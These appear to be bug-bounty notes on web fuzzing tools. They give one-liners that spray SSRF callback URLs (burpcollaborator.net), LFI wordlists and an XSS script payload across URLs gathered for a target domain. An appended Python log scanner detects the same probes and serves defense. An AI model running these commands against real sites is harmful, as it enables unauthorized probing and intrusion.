FUZZ
Contents
Tools
gau
Collects known URLs for a domain from various sources.
qsreplace
Replaces the value of every query parameter in a URL with a single fixed value.
ffuf
General-purpose web fuzzing tool.
gf
https://github.com/1ndianl33t/Gf-Patterns
A powerful pattern-matching wrapper around grep ("grep plus"). Commands such as gf xss quickly pick out URLs that are relevant to XSS.
HTTPX
Liveness probing plus fingerprinting.
FUZZ ssrf
findomain -t example.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net
FUZZ LFI
findomain -t example.com -q | waybackurls | gf lfi | qsreplace FUZZ | while read url; do ffuf -u "$url" -mr "root:x" -w ~/wordlist/LFI.txt; done
FUZZ xss
cat file.txt | gf xss | grep 'source=' | qsreplace '"><script>confirm(1)</script>' | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo -e "$host \033[0;31mVulnerable\033[0m\n"; done
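A defender's counterpart to the one-liners above, added here as an example that is not part of the original notes: a Python script that parses web server access-log lines, flags requests carrying the probe signatures these commands send (directory traversal and /etc/passwd for the LFI check, the confirm(1) script payload for the XSS check, the burpcollaborator.net callback host for the SSRF check), and groups the hits per source IP by a qsreplace-style normalised URL so repeated probes against the same parameter collapse into one row. The log lines, IP addresses and the FUZZ placeholder are constructed for this example; only the Python standard library is used.

```python
"""Detect and group the probe patterns from the one-liners above in access logs.

Added example. The log lines below are constructed (Combined Log Format) and
the signature list covers only the payloads shown in the notes.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit, urlunsplit

# Constructed sample log lines; not captured from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /view?file=../../etc/passwd HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /view?file=....//....//etc/passwd HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /search?source=%22%3E%3Cscript%3Econfirm(1)%3C/script%3E HTTP/1.1" 200 512 "-" "curl/8.1"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /fetch?url=http://YOUR.burpcollaborator.net HTTP/1.1" 302 0 "-" "curl/8.1"
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /search?q=cats HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined Log Format: ip ident user [timestamp] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# Request-side signatures of the three checks in the notes, applied to the
# URL-decoded path so percent-encoded payloads are not missed.
SIGNATURES = {
    "lfi-probe": re.compile(r"(\.\./|\.\.\\|etc/passwd)", re.I),
    "xss-probe": re.compile(r"<script>confirm\(1\)", re.I),
    "ssrf-oob-callback": re.compile(r"burpcollaborator\.net", re.I),
}


def normalize_url(path: str, placeholder: str = "FUZZ") -> str:
    """Replace every query value with a placeholder, as qsreplace does, so that
    requests differing only in parameter values group together."""
    parts = urlsplit(path)
    params = parse_qsl(parts.query, keep_blank_values=True)
    query = "&".join(f"{key}={placeholder}" for key, _ in params)
    return urlunsplit(("", "", parts.path, query, ""))


def classify_request(path: str) -> list[str]:
    """Return the names of all signatures matching the decoded request path."""
    decoded = unquote(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(text: str) -> dict[tuple[str, str], list[str]]:
    """Map (source_ip, normalised_url) to the list of signature hits seen for it.

    Lines that do not parse or match no signature are skipped.
    """
    hits: dict[tuple[str, str], list[str]] = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["path"])
        if tags:
            hits[(m["ip"], normalize_url(m["path"]))].extend(tags)
    return dict(hits)


if __name__ == "__main__":
    for (ip, url), tags in sorted(scan_log(SAMPLE_LOG).items()):
        kinds = ", ".join(sorted(set(tags)))
        print(f"{ip:15} {url:30} {len(tags):2d} hit(s): {kinds}")
```

Grouping by the normalised URL is what makes the output useful during triage: the two traversal variants against /view?file= become one row with two hits, which is the shape of an automated LFI wordlist run rather than a single stray request, while the benign /search?q=cats line produces nothing.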